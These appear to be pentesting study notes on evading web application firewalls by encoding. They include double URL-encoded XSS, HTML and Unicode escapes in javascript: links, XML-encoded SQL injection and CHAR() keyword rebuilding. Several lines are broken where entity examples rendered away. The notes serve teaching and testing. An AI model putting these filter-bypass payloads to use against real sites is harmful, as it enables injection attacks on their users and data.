Note: For Javascript obfuscation go on [Javascript & Obfuscation]({{< ref “web/web-security/javascript and obfuscation/index” >}}).
Sometimes, WAFs may fail to properly URL decode your input during checks.
-> Encode the keywords, so SELECT becomes
%53%45%4C%45%43%54.
Since the WAF decodes the input only once, it may fail to detect the threat. If the back-end server double-decodes it, the payload will be injected successfully.
[...]/?search=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253EIn certain HTML locations, like element text or attribute values, browsers automatically decode these references when parsing.
Server-side checks for alert() may miss it if you HTML encode characters.
<img src=x onerror="alert(1)">When the browser renders the page, it will decode and execute the injected payload.
Leading zeros
HTML encode : -> : =
:
<a href="javascript:alert(1)">Click me</a>
XML supports character encoding with the same numeric escape sequences as HTML.
<stockCheck>
<productId>
123
</productId>
<storeId>
999 SELECT * FROM information_schema.tables
</storeId>
</stockCheck><a href="javascript:\u0061lert(1)">Click me</a>(HTML) \ -> \
<a href="javascript:\u0061lert(1)">Click me</a>(Unicode) \u0061 -> a
<a href="javascript:alert(1)">Click me</a>CHAR(83) = CHAR(0x53) =
S
SELECT is blacklisted ->
CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)